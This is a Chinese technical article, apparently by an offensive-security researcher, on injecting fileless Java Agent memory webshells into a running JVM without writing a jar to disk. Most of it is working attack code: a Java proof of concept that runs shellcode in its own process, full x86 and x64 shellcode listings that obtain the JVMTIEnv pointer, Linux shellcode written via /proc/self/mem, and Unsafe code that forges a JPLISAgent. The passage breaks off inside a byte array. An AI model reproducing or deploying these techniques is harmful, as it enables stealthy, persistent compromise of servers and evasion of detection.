• 回顾
• 优雅的构造JPLISAgent
• Windows平台
• Linux平台
• 获取JVMTIEnv指针
• 组装JPLISAgent
• 动态修改类
• Windows平台
• Linux平台
• 植入内存马
• 后记
• 参考
1. 上传inject.jar到服务器用来枚举jvm并进行植入;
2. 上传agent.jar到服务器用来承载webshell功能;
3. 执行系统命令java -jar inject.jar。
1. 上传agent.jar到服务器用来承载webshell功能;
2. 冰蝎服务端调用Java API将agent.jar植入自身进程完成注入。
作为一个“强迫症患者”,我一直认为上述的植入过程都不够优雅。attacker追求的是微操、无痕,而Agent内存马的植入却要在目标磁盘上落地一个Jar包,这个操作太“脏”了。
当然,在此期间,很多优秀的安全研究者将目标转向了向目标容器中新增各种Java Web组件上,比如新增一个Filter、Servlet、Listener、Spring的Controller等等,这种方式需要引入一些额外的相互引用关系,容易被检测到。而且对目标容器环境有较强的依赖性,不同的组件、不同的容器或者不同的版本,注入方法可能都不一样,通用性较弱。
在《Java内存攻击技术漫谈》一文中,我使用了特征字典+暴力内存搜索的方式来获取Native内存中的JVMTIEnv对象指针,由于ASLR的原因,在搜索过程中,很可能会将非指针数据作为指针来访问,从而触发内存访问异常,OS会直接接管这个异常并结束JVM进程。
如何才能精准的获取JVMTIEnv的指针呢?
可以利用JNI_GetCreatedJavaVMs函数。游望之在《Linux下内存马进阶植入技术》一文中提到,JavaVM对象中存在一个名为GetEnv的成员函数,如下:
struct JavaVM_ {
const struct JNIInvokeInterface_ *functions;
#ifdef __cplusplus
jint DestroyJavaVM() {
return functions->DestroyJavaVM(this);
}
jint AttachCurrentThread(void **penv, void *args) {
return functions->AttachCurrentThread(this, penv, args);
}
jint DetachCurrentThread() {
return functions->DetachCurrentThread(this);
}
jint GetEnv(void **penv, jint version) {
return functions->GetEnv(this, penv, version);
}
jint AttachCurrentThreadAsDaemon(void **penv, void *args) {
return functions->AttachCurrentThreadAsDaemon(this, penv, args);
}
#endif
};
怎么样获得JavaVM对象呢?我相信如果是熟悉Java Native开发的同学可能对此并不陌生,在jvm.dll中存在一个名为JNI_GetCreatedJavaVMs的函数,该函数是JVM提供给Java Native开发人员用来在Native层获取VM对象的,因为是开放给开发者使用的,所以该函数是导出的。我们可以直接调用这个函数来获取JavaVM对象。
但是,怎么调用JNI_GetCreatedJavaVMs呢?该函数的规矩用法是需要先开发一个Java的dll动态链接库,然后在Java代码中加载这个dll库,然后再调用dll中的方法。当然这不是我们希望的,如果我们愿意去写个dll上传加载,那还不如直接上传个agent.jar来的方便。
有没有可能不用开发额外的dll文件或者so文件来调用JNI相关的函数呢?有。
在《Java内存攻击技术漫谈》一文中,我提出了一种可以在Windows平台下通过Java向指定进程植入并运行shellcode的方法,当目标进程PID为-1时,即可向自身进程植入并运行shellcode,Poc如下:
import java.lang.reflect.Method;
public class RunShellCode {
public static void main(String[] args) throws Exception {
System.loadLibrary("attach");
Class cls=Class.forName("sun.tools.attach.WindowsVirtualMachine");
for (Method m:cls.getDeclaredMethods())
{
if (m.getName().equals("enqueue"))
{
long hProcess=-1;
byte shellcode[] = new byte[] //pop calc.exe x64
{
(byte) 0xfc, (byte) 0x48, (byte) 0x83, (byte) 0xe4, (byte) 0xf0, (byte) 0xe8, (byte) 0xc0, (byte) 0x00,
(byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0x51, (byte) 0x41, (byte) 0x50, (byte) 0x52, (byte) 0x51,
(byte) 0x56, (byte) 0x48, (byte) 0x31, (byte) 0xd2, (byte) 0x65, (byte) 0x48, (byte) 0x8b, (byte) 0x52,
(byte) 0x60, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x18, (byte) 0x48, (byte) 0x8b, (byte) 0x52,
(byte) 0x20, (byte) 0x48, (byte) 0x8b, (byte) 0x72, (byte) 0x50, (byte) 0x48, (byte) 0x0f, (byte) 0xb7,
(byte) 0x4a, (byte) 0x4a, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,
(byte) 0xac, (byte) 0x3c, (byte) 0x61, (byte) 0x7c, (byte) 0x02, (byte) 0x2c, (byte) 0x20, (byte) 0x41,
(byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1, (byte) 0xe2, (byte) 0xed,
(byte) 0x52, (byte) 0x41, (byte) 0x51, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x20, (byte) 0x8b,
(byte) 0x42, (byte) 0x3c, (byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x8b, (byte) 0x80, (byte) 0x88,
(byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x85, (byte) 0xc0, (byte) 0x74, (byte) 0x67,
(byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x50, (byte) 0x8b, (byte) 0x48, (byte) 0x18, (byte) 0x44,
(byte) 0x8b, (byte) 0x40, (byte) 0x20, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0xe3, (byte) 0x56,
(byte) 0x48, (byte) 0xff, (byte) 0xc9, (byte) 0x41, (byte) 0x8b, (byte) 0x34, (byte) 0x88, (byte) 0x48,
(byte) 0x01, (byte) 0xd6, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,
(byte) 0xac, (byte) 0x41, (byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1,
(byte) 0x38, (byte) 0xe0, (byte) 0x75, (byte) 0xf1, (byte) 0x4c, (byte) 0x03, (byte) 0x4c, (byte) 0x24,
(byte) 0x08, (byte) 0x45, (byte) 0x39, (byte) 0xd1, (byte) 0x75, (byte) 0xd8, (byte) 0x58, (byte) 0x44,
(byte) 0x8b, (byte) 0x40, (byte) 0x24, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0x66, (byte) 0x41,
(byte) 0x8b, (byte) 0x0c, (byte) 0x48, (byte) 0x44, (byte) 0x8b, (byte) 0x40, (byte) 0x1c, (byte) 0x49,
(byte) 0x01, (byte) 0xd0, (byte) 0x41, (byte) 0x8b, (byte) 0x04, (byte) 0x88, (byte) 0x48, (byte) 0x01,
(byte) 0xd0, (byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x58, (byte) 0x5e, (byte) 0x59, (byte) 0x5a,
(byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x59, (byte) 0x41, (byte) 0x5a, (byte) 0x48, (byte) 0x83,
(byte) 0xec, (byte) 0x20, (byte) 0x41, (byte) 0x52, (byte) 0xff, (byte) 0xe0, (byte) 0x58, (byte) 0x41,
(byte) 0x59, (byte) 0x5a, (byte) 0x48, (byte) 0x8b, (byte) 0x12, (byte) 0xe9, (byte) 0x57, (byte) 0xff,
(byte) 0xff, (byte) 0xff, (byte) 0x5d, (byte) 0x48, (byte) 0xba, (byte) 0x01, (byte) 0x00, (byte) 0x00,
(byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x8d, (byte) 0x8d,
(byte) 0x01, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0xba, (byte) 0x31, (byte) 0x8b,
(byte) 0x6f, (byte) 0x87, (byte) 0xff, (byte) 0xd5, (byte) 0xbb, (byte) 0xf0, (byte) 0xb5, (byte) 0xa2,
(byte) 0x56, (byte) 0x41, (byte) 0xba, (byte) 0xa6, (byte) 0x95, (byte) 0xbd, (byte) 0x9d, (byte) 0xff,
(byte) 0xd5, (byte) 0x48, (byte) 0x83, (byte) 0xc4, (byte) 0x28, (byte) 0x3c, (byte) 0x06, (byte) 0x7c,
(byte) 0x0a, (byte) 0x80, (byte) 0xfb, (byte) 0xe0, (byte) 0x75, (byte) 0x05, (byte) 0xbb, (byte) 0x47,
(byte) 0x13, (byte) 0x72, (byte) 0x6f, (byte) 0x6a, (byte) 0x00, (byte) 0x59, (byte) 0x41, (byte) 0x89,
(byte) 0xda, (byte) 0xff, (byte) 0xd5, (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e,
(byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00
};
String cmd="load";String pipeName="test";
m.setAccessible(true);
Object result=m.invoke(cls,new Object[]{hProcess,shellcode,cmd,pipeName,new Object[]{}});
}
}
}
}
为了避免目标没有WindowsVirtualMachine,自己写一个同名类:
package sun.tools.attach;
import java.io.IOException;
public class WindowsVirtualMachine {
static native void enqueue(long hProcess, byte[] stub,String cmd, String pipename, Object... args) throws IOException;
}
基于这个方法,我们可以写一段通用的shellcode来动态调用jvm.dll中的JNI_GetCreatedJavaVMs。
这段shellcode的主要工作流程是:
1. 先获取到当前进程kernel32.dll的基址;
2. 在kernel32.dll的输出表中,获取GetProcessAddress函数的地址;
3. 调用GetProcessAddress获取LoadLibraryA函数的地址;
4. 调用LoadLibraryA加载jvm.dll获取jvm.dll模块在当前进程中的基址;
5. 调用GerProcAddress在jvm.dll中获取JNI_GetCreatedJavaVMs的地址;
6. 调用JNI_GetCreatedJavaVMs;
7. 还原现场,安全退出线程,优雅地离开,避免shellcode执行完后进程崩溃。
如下是x86版本的shellcode:
00830000 | 90 | nop |
00830001 | 90 | nop |
00830002 | 90 | nop |
00830003 | 33C9 | xor ecx,ecx |
00830005 | 64:A1 30000000 | mov eax,dword ptr fs:[30] |
0083000B | 8B40 0C | mov eax,dword ptr ds:[eax+C] |
0083000E | 8B70 14 | mov esi,dword ptr ds:[eax+14] |
00830011 | AD | lodsd |
00830012 | 96 | xchg esi,eax |
00830013 | AD | lodsd |
00830014 | 8B58 10 | mov ebx,dword ptr ds:[eax+10] | ebx:"MZ?"
00830017 | 8B53 3C | mov edx,dword ptr ds:[ebx+3C] | edx:"MZ?"
0083001A | 03D3 | add edx,ebx | edx:"MZ?", ebx:"MZ?"
0083001C | 8B52 78 | mov edx,dword ptr ds:[edx+78] | edx:"MZ?"
0083001F | 03D3 | add edx,ebx | edx:"MZ?", ebx:"MZ?"
00830021 | 33C9 | xor ecx,ecx |
00830023 | 8B72 20 | mov esi,dword ptr ds:[edx+20] |
00830026 | 03F3 | add esi,ebx | ebx:"MZ?"
00830028 | 41 | inc ecx |
00830029 | AD | lodsd |
0083002A | 03C3 | add eax,ebx | ebx:"MZ?"
0083002C | 8138 47657450 | cmp dword ptr ds:[eax],50746547 |
00830032 | 75 F4 | jne 830028 |
00830034 | 8178 04 726F6341 | cmp dword ptr ds:[eax+4],41636F72 |
0083003B | 75 EB | jne 830028 |
0083003D | 8178 08 64647265 | cmp dword ptr ds:[eax+8],65726464 |
00830044 | 75 E2 | jne 830028 |
00830046 | 8B72 24 | mov esi,dword ptr ds:[edx+24] |
00830049 | 03F3 | add esi,ebx | ebx:"MZ?"
0083004B | 66:8B0C4E | mov cx,word ptr ds:[esi+ecx*2] |
0083004F | 49 | dec ecx |
00830050 | 8B72 1C | mov esi,dword ptr ds:[edx+1C] |
00830053 | 03F3 | add esi,ebx | ebx:"MZ?"
00830055 | 8B148E | mov edx,dword ptr ds:[esi+ecx*4] | edx:"MZ?"
00830058 | 03D3 | add edx,ebx | edx:"MZ?", ebx:"MZ?"
0083005A | 52 | push edx | edx:"MZ?"
0083005B | 33C9 | xor ecx,ecx |
0083005D | 51 | push ecx |
0083005E | 68 61727941 | push 41797261 |
00830063 | 68 4C696272 | push 7262694C |
00830068 | 68 4C6F6164 | push 64616F4C |
0083006D | 54 | push esp |
0083006E | 53 | push ebx | ebx:"MZ?"
0083006F | FFD2 | call edx |
00830071 | 83C4 0C | add esp,C |
00830074 | 59 | pop ecx |
00830075 | 50 | push eax |
00830076 | 66:B9 3332 | mov cx,3233 |
0083007A | 51 | push ecx |
0083007B | 68 6A766D00 | push 6D766A | 6D766A:L"$$笔划$$字根/笔划"
00830080 | 54 | push esp |
00830081 | FFD0 | call eax |
00830083 | 8BD8 | mov ebx,eax | ebx:"MZ?"
00830085 | 83C4 0C | add esp,C |
00830088 | 5A | pop edx | edx:"MZ?"
00830089 | 33C9 | xor ecx,ecx |
0083008B | 51 | push ecx |
0083008C | 6A 73 | push 73 |
0083008E | 68 7661564D | push 4D566176 |
00830093 | 68 65644A61 | push 614A6465 |
00830098 | 68 72656174 | push 74616572 |
0083009D | 68 47657443 | push 43746547 |
008300A2 | 68 4A4E495F | push 5F494E4A |
008300A7 | 54 | push esp |
008300A8 | 53 | push ebx | ebx:"MZ?"
008300A9 | FFD2 | call edx |
008300AB | 8945 F0 | mov dword ptr ss:[ebp-10],eax |
008300AE | 54 | push esp |
008300AF | 6A 01 | push 1 |
008300B1 | 54 | push esp |
008300B2 | 59 | pop ecx |
008300B3 | 83C1 10 | add ecx,10 |
008300B6 | 51 | push ecx |
008300B7 | 54 | push esp |
008300B8 | 59 | pop ecx |
008300B9 | 6A 01 | push 1 |
008300BB | 51 | push ecx |
008300BC | FFD0 | call eax |
008300BE | 8BC1 | mov eax,ecx |
008300C0 | 83EC 30 | sub esp,30 |
008300C3 | 6A 00 | push 0 |
008300C5 | 54 | push esp |
008300C6 | 59 | pop ecx |
008300C7 | 83C1 10 | add ecx,10 |
008300CA | 51 | push ecx |
008300CB | 8B00 | mov eax,dword ptr ds:[eax] |
008300CD | 50 | push eax |
008300CE | 8B18 | mov ebx,dword ptr ds:[eax] | ebx:"MZ?"
008300D0 | 8B43 10 | mov eax,dword ptr ds:[ebx+10] |
008300D3 | FFD0 | call eax |
008300D5 | 8B43 18 | mov eax,dword ptr ds:[ebx+18] |
008300D8 | 68 00020130 | push 30010200 |
008300DD | 68 14610317 | push 17036114 |;该内存地址是JavaVM->GetEnv的第一个参数,由我们动态指定,用来接收jvmti对象的地址
008300E2 | 83EC 04 | sub esp,4 |
008300E5 | FFD0 | call eax |
008300E7 | 83EC 0C | sub esp,C |
008300EA | 8B43 14 | mov eax,dword ptr ds:[ebx+14] |
008300ED | FFD0 | call eax |
008300EF | 83C4 5C | add esp,5C |
008300F2 | C3 | ret |
如下是x64版本的shellcode:
00000000541E0000 | 48:83EC 28 | sub rsp,28 |
00000000541E0004 | 48:83E4 F0 | and rsp,FFFFFFFFFFFFFFF0 |
00000000541E0008 | 48:31C9 | xor rcx,rcx |
00000000541E000B | 6548:8B41 60 | mov rax,qword ptr gs:[rcx+60] |
00000000541E0010 | 48:8B40 18 | mov rax,qword ptr ds:[rax+18] |
00000000541E0014 | 48:8B70 20 | mov rsi,qword ptr ds:[rax+20] |
00000000541E0018 | 48:AD | lodsq |
00000000541E001A | 48:96 | xchg rsi,rax |
00000000541E001C | 48:AD | lodsq |
00000000541E001E | 48:8B58 20 | mov rbx,qword ptr ds:[rax+20] | rbx:"MZ?"
00000000541E0022 | 4D:31C0 | xor r8,r8 |
00000000541E0025 | 44:8B43 3C | mov r8d,dword ptr ds:[rbx+3C] |
00000000541E0029 | 4C:89C2 | mov rdx,r8 |
00000000541E002C | 48:01DA | add rdx,rbx | rbx:"MZ?"
00000000541E002F | 44:8B82 88000000 | mov r8d,dword ptr ds:[rdx+88] |
00000000541E0036 | 49:01D8 | add r8,rbx | rbx:"MZ?"
00000000541E0039 | 48:31F6 | xor rsi,rsi |
00000000541E003C | 41:8B70 20 | mov esi,dword ptr ds:[r8+20] |
00000000541E0040 | 48:01DE | add rsi,rbx | rbx:"MZ?"
00000000541E0043 | 48:31C9 | xor rcx,rcx |
00000000541E0046 | 49:B9 47657450726F6341 | mov r9,41636F7250746547 |
00000000541E0050 | 48:FFC1 | inc rcx |
00000000541E0053 | 48:31C0 | xor rax,rax |
00000000541E0056 | 8B048E | mov eax,dword ptr ds:[rsi+rcx*4] |
00000000541E0059 | 48:01D8 | add rax,rbx | rbx:"MZ?"
00000000541E005C | 4C:3908 | cmp qword ptr ds:[rax],r9 |
00000000541E005F | 75 EF | jne 541E0050 |
00000000541E0061 | 48:31F6 | xor rsi,rsi |
00000000541E0064 | 41:8B70 24 | mov esi,dword ptr ds:[r8+24] |
00000000541E0068 | 48:01DE | add rsi,rbx | rbx:"MZ?"
00000000541E006B | 66:8B0C4E | mov cx,word ptr ds:[rsi+rcx*2] |
00000000541E006F | 48:31F6 | xor rsi,rsi |
00000000541E0072 | 41:8B70 1C | mov esi,dword ptr ds:[r8+1C] |
00000000541E0076 | 48:01DE | add rsi,rbx | rbx:"MZ?"
00000000541E0079 | 48:31D2 | xor rdx,rdx |
00000000541E007C | 8B148E | mov edx,dword ptr ds:[rsi+rcx*4] |
00000000541E007F | 48:01DA | add rdx,rbx | rbx:"MZ?"
00000000541E0082 | 48:89D7 | mov rdi,rdx |
00000000541E0085 | B9 61727941 | mov ecx,41797261 |
00000000541E008A | 51 | push rcx |
00000000541E008B | 48:B9 4C6F61644C696272 | mov rcx,7262694C64616F4C |
00000000541E0095 | 51 | push rcx |
00000000541E0096 | 48:89E2 | mov rdx,rsp |
00000000541E0099 | 48:89D9 | mov rcx,rbx | rbx:"MZ?"
00000000541E009C | 48:83EC 30 | sub rsp,30 |
00000000541E00A0 | FFD7 | call rdi |
00000000541E00A2 | 48:83C4 30 | add rsp,30 |
00000000541E00A6 | 48:83C4 10 | add rsp,10 |
00000000541E00AA | 48:89C6 | mov rsi,rax |
00000000541E00AD | B9 6C6C0000 | mov ecx,6C6C |
00000000541E00B2 | 51 | push rcx |
00000000541E00B3 | B9 6A766D00 | mov ecx,6D766A |
00000000541E00B8 | 51 | push rcx |
00000000541E00B9 | 48:89E1 | mov rcx,rsp |
00000000541E00BC | 48:83EC 30 | sub rsp,30 |
00000000541E00C0 | FFD6 | call rsi |
00000000541E00C2 | 48:83C4 30 | add rsp,30 |
00000000541E00C6 | 48:83C4 10 | add rsp,10 |
00000000541E00CA | 49:89C7 | mov r15,rax |
00000000541E00CD | 48:31C9 | xor rcx,rcx |
00000000541E00D0 | 48:B9 7661564D73000000 | mov rcx,734D566176 |
00000000541E00DA | 51 | push rcx |
00000000541E00DB | 48:B9 7265617465644A61 | mov rcx,614A646574616572 |
00000000541E00E5 | 51 | push rcx |
00000000541E00E6 | 48:B9 4A4E495F47657443 | mov rcx,437465475F494E4A |
00000000541E00F0 | 51 | push rcx |
00000000541E00F1 | 48:89E2 | mov rdx,rsp |
00000000541E00F4 | 4C:89F9 | mov rcx,r15 |
00000000541E00F7 | 48:83EC 28 | sub rsp,28 |
00000000541E00FB | FFD7 | call rdi |
00000000541E00FD | 48:83C4 28 | add rsp,28 |
00000000541E0101 | 48:83C4 18 | add rsp,18 |
00000000541E0105 | 49:89C7 | mov r15,rax |
00000000541E0108 | 48:83EC 28 | sub rsp,28 |
00000000541E010C | 48:89E1 | mov rcx,rsp |
00000000541E010F | BA 01000000 | mov edx,1 |
00000000541E0114 | 49:89C8 | mov r8,rcx |
00000000541E0117 | 49:83C0 08 | add r8,8 |
00000000541E011B | 48:83EC 28 | sub rsp,28 |
00000000541E011F | 41:FFD7 | call r15 |
00000000541E0122 | 48:83C4 28 | add rsp,28 |
00000000541E0126 | 48:8B09 | mov rcx,qword ptr ds:[rcx] |
00000000541E0129 | 48:83EC 20 | sub rsp,20 |
00000000541E012D | 54 | push rsp |
00000000541E012E | 48:89E2 | mov rdx,rsp |
00000000541E0131 | 4D:31C0 | xor r8,r8 |
00000000541E0134 | 4C:8B39 | mov r15,qword ptr ds:[rcx] |
00000000541E0137 | 4D:8B7F 20 | mov r15,qword ptr ds:[r15+20] |
00000000541E013B | 49:89CE | mov r14,rcx |
00000000541E013E | 41:FFD7 | call r15 |
00000000541E0141 | 4C:89F1 | mov rcx,r14 |
00000000541E0144 | 48:BA A8752F5600000000 | mov rdx,562F75A8 | ;该内存地址是JavaVM->GetEnv的第一个参数,由我们动态指定,用来接收jvmti对象的地址
00000000541E014E | 41:B8 00020130 | mov r8d,30010200 |
00000000541E0154 | 4D:8B3E | mov r15,qword ptr ds:[r14] |
00000000541E0157 | 4D:8B7F 30 | mov r15,qword ptr ds:[r15+30] |
00000000541E015B | 48:83EC 20 | sub rsp,20 |
00000000541E015F | 41:FFD7 | call r15 |
00000000541E0162 | 48:83C4 20 | add rsp,20 |
00000000541E0166 | 4C:89F1 | mov rcx,r14 |
00000000541E0169 | 4D:8B3E | mov r15,qword ptr ds:[r14] |
00000000541E016C | 4D:8B7F 28 | mov r15,qword ptr ds:[r15+28] |
00000000541E0170 | 41:FFD7 | call r15 |
00000000541E0173 | 48:83C4 78 | add rsp,78 |
00000000541E0177 | C3 | ret |
由于Windows平台和Linux平台在Attach机制上的区别,Linux平台下并没有直接原生执行shellcode的方法,不过我们可以使用游望之的文章《Linux下内存马进阶植入技术》中提出的方法,通过修改/proc/self/mem的方式来执行shellcode,主要流程如下:
1. 解析libjvm.so的ELF头,得到Java_java_io_RandomAccessFile_length和JNI_GetCreatedJavaVMs的偏移;
2. 解析/proc/self/maps取得libjvm.so的加载基址,加上步骤1中获取的偏移地址,得到Java_java_io_RandomAccessFile_length和JNI_GetCreatedJavaVMs函数在内存中的地址;
3. 编写shellcode,调用JNI_GetCreatedJavaVMs获取的JVMTIEnv对象的指针;
4. 备份Java_java_io_RandomAccessFile_length函数体;
5. 将步骤3中的shellcode写入Java_java_io_RandomAccessFile_length地址;
6. 在Java层调用Java_java_io_RandomAccessFile_length获得一个long型的返回值,即JVMTIEnv对象的指针;
7. 恢复Java_java_io_RandomAccessFile_length代码;
8. 利用JVMTIEnv对象的指针,构造JPLISAgent。
具体细节可以参考游望之的文章《Linux下内存马进阶植入技术》,里有详细描述。
shellcode:
push rbp
mov rbp, rsp
mov rax, 0xf
not rax
and rsp, rax
movabs rax, _JNI_GetCreatedJavaVMs
sub rsp, 40h
xor rsi, rsi
inc rsi
lea rdx, [rsp+4]
lea rdi, [rsp+8]
call rax
mov rdi, [rsp+8]
lea rsi, [rsp+10h]
mov edx, 30010200h
mov rax, [rdi]
call qword ptr [rax+30h]
mov rax, [rsp+10h]
add rsp, 40h
leave
ret
有了JVMTIEnv对象的指针,就可以构造JPLISAgent对象了,如下:
private long getJPLISAgent() {
long pointerLength = 8;
Unsafe unsafe = null;
try {
Field field = Unsafe.class.getDeclaredField("theUnsafe");
field.setAccessible(true);
unsafe = (Unsafe)field.get((Object)null);
} catch (Exception var14) {
throw new AssertionError(var14);
}
long JPLISAgent = unsafe.allocateMemory(4096L);
long native_jvmtienv = unsafe.getLong(JPLISAgent + (long)pointerLength);
if (pointerLength == 4) {
unsafe.putByte(native_jvmtienv + 201L, (byte)2);
} else {
unsafe.putByte(native_jvmtienv + 361L, (byte)2);
}
return JPLISAgent;
}
在上文中,分别介绍了Windows平台和Linux平台下构造JPLISAgent对象的方法,有了JPLISAgent对象,就可以调用Java Agent的所有能力了,当然我们感兴趣的还是类的动态修改功能。
把上文中获取JVMTIEnv指针的shellcode和Java代码结合起来,同时考虑指针长度为4和8的情况:
/**
* @version 1.0
* @Author rebeyond
* @Date 2022/7/1 12:59
* @注释
*/
package sun.tools.attach;
import sun.misc.Unsafe;
import java.io.IOException;
import java.lang.instrument.ClassDefinition;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
public class WindowsVirtualMachine {
public static int pointerLength=8;
public static String className;
public static byte[] classBody;
static native void enqueue(long hProcess, byte[] stub,
String cmd, String pipename, Object... args) throws IOException;
public static void work() throws Exception {
Unsafe unsafe = null;
try {
Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe");
field.setAccessible(true);
unsafe = (sun.misc.Unsafe) field.get(null);
} catch (Exception e) {
throw new AssertionError(e);
}
//伪造JPLISAgent结构时,只需要填mNormalEnvironment中的mJVMTIEnv即可,其他变量代码中实际没有使用
long JPLISAgent = unsafe.allocateMemory(0x1000);
byte[] buf=new byte[]{(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x28,(byte)0x48,(byte)0x83,(byte)0xE4,(byte)0xF0,(byte)0x48,(byte)0x31,(byte)0xC9,(byte)0x65,(byte)0x48,(byte)0x8B,(byte)0x41,(byte)0x60,(byte)0x48,(byte)0x8B,(byte)0x40,(byte)0x18,(byte)0x48,(byte)0x8B,(byte)0x70,(byte)0x20,(byte)0x48,(byte)0xAD,(byte)0x48,(byte)0x96,(byte)0x48,(byte)0xAD,(byte)0x48,(byte)0x8B,(byte)0x58,(byte)0x20,(byte)0x4D,(byte)0x31,(byte)0xC0,(byte)0x44,(byte)0x8B,(byte)0x43,(byte)0x3C,(byte)0x4C,(byte)0x89,(byte)0xC2,(byte)0x48,(byte)0x01,(byte)0xDA,(byte)0x44,(byte)0x8B,(byte)0x82,(byte)0x88,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x49,(byte)0x01,(byte)0xD8,(byte)0x48,(byte)0x31,(byte)0xF6,(byte)0x41,(byte)0x8B,(byte)0x70,(byte)0x20,(byte)0x48,(byte)0x01,(byte)0xDE,(byte)0x48,(byte)0x31,(byte)0xC9,(byte)0x49,(byte)0xB9,(byte)0x47,(byte)0x65,(byte)0x74,(byte)0x50,(byte)0x72,(byte)0x6F,(byte)0x63,(byte)0x41,(byte)0x48,(byte)0xFF,(byte)0xC1,(byte)0x48,(byte)0x31,(byte)0xC0,(byte)0x8B,(byte)0x04,(byte)0x8E,(byte)0x48,(byte)0x01,(byte)0xD8,(byte)0x4C,(byte)0x39,(byte)0x08,(byte)0x75,(byte)0xEF,(byte)0x48,(byte)0x31,(byte)0xF6,(byte)0x41,(byte)0x8B,(byte)0x70,(byte)0x24,(byte)0x48,(byte)0x01,(byte)0xDE,(byte)0x66,(byte)0x8B,(byte)0x0C,(byte)0x4E,(byte)0x48,(byte)0x31,(byte)0xF6,(byte)0x41,(byte)0x8B,(byte)0x70,(byte)0x1C,(byte)0x48,(byte)0x01,(byte)0xDE,(byte)0x48,(byte)0x31,(byte)0xD2,(byte)0x8B,(byte)0x14,(byte)0x8E,(byte)0x48,(byte)0x01,(byte)0xDA,(byte)0x48,(byte)0x89,(byte)0xD7,(byte)0xB9,(byte)0x61,(byte)0x72,(byte)0x79,(byte)0x41,(byte)0x51,(byte)0x48,(byte)0xB9,(byte)0x4C,(byte)0x6F,(byte)0x61,(byte)0x64,(byte)0x4C,(byte)0x69,(byte)0x62,(byte)0x72,(byte)0x51,(byte)0x48,(byte)0x89,(byte)0xE2,(byte)0x48,(byte)0x89,(byte)0xD9,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x30,(byte)0xFF,(byte)0xD7,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x30,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x10,(byte)0x48,(byte)0x89,(byte)0xC6,(byte)0xB9,(byte)0x6C,(byte)0x6C,(byte)0x00,(byte)0x00,(byte)0x51,(byte)0xB9,(byte)0x6A,(byte)0x76,(byte)0x6D,(byte)0x00,(byte)0x51,(byte)0x48,(byte)0x89,(byte)0xE1,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x30,(byte)0xFF,(byte)0xD6,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x30,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x10,(byte)0x49,(byte)0x89,(byte)0xC7,(byte)0x48,(byte)0x31,(byte)0xC9,(byte)0x48,(byte)0xB9,(byte)0x76,(byte)0x61,(byte)0x56,(byte)0x4D,(byte)0x73,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x51,(byte)0x48,(byte)0xB9,(byte)0x72,(byte)0x65,(byte)0x61,(byte)0x74,(byte)0x65,(byte)0x64,(byte)0x4A,(byte)0x61,(byte)0x51,(byte)0x48,(byte)0xB9,(byte)0x4A,(byte)0x4E,(byte)0x49,(byte)0x5F,(byte)0x47,(byte)0x65,(byte)0x74,(byte)0x43,(byte)0x51,(byte)0x48,(byte)0x89,(byte)0xE2,(byte)0x4C,(byte)0x89,(byte)0xF9,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x28,(byte)0xFF,(byte)0xD7,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x28,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x18,(byte)0x49,(byte)0x89,(byte)0xC7,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x28,(byte)0x48,(byte)0x89,(byte)0xE1,(byte)0xBA,(byte)0x01,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x49,(byte)0x89,(byte)0xC8,(byte)0x49,(byte)0x83,(byte)0xC0,(byte)0x08,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x28,(byte)0x41,(byte)0xFF,(byte)0xD7,(byte)0x48,(byte)0x83,(byte)0xC4,(byte)0x28,(byte)0x48,(byte)0x8B,(byte)0x09,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x20,(byte)0x54,(byte)0x48,(byte)0x89,(byte)0xE2,(byte)0x4D,(byte)0x31,(byte)0xC0,(byte)0x4C,(byte)0x8B,(byte)0x39,(byte)0x4D,(byte)0x8B,(byte)0x7F,(byte)0x20,(byte)0x49,(byte)0x89,(byte)0xCE,(byte)0x41,(byte)0xFF,(byte)0xD7,(byte)0x4C,(byte)0x89,(byte)0xF1,(byte)0x48,(byte)0xBA,(byte)0x48,(byte)0x47,(byte)0x46,(byte)0x45,(byte)0x44,(byte)0x43,(byte)0x42,(byte)0x41,(byte)0x41,(byte)0xB8,(byte)0x00,(byte)0x02,(byte)0x01,(byte)0x30,(byte)0x4D,(byte)0x8B,(byte)0x3E,(byte)0x4D,(byte)0x8B,(byte)0x7F,(byte)0x30,(byte)0x48,(byte)0x83,(byte)0xEC,(byte)0x20,(byte)0x41,(byte)0xFF,(byte)0xD7,(byte)0x48,(byte)0x83,(byte)0xC4,(by